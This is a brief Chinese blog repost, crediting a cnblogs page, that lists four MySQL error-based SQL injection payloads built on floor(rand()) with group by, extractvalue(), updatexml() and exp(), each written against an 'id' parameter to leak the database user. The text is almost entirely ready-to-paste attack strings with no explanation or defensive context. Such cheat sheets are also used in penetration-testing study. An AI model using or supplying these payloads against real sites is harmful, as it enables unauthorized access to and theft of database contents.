转自:http://www.cnblogs.com/Dleo/p/5493782.html
~全部都以查user()为例子~
1.floor()
id = 1 and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a)
2.extractvalue()
id = 1 and (extractvalue(1, concat(0x5c,(select user()))))
3.updatexml()
id = 1 and (updatexml(0x3a,concat(1,(select user())),1))
4.exp()
id =1 and EXP(~(SELECT * from(select user())a))
网友评论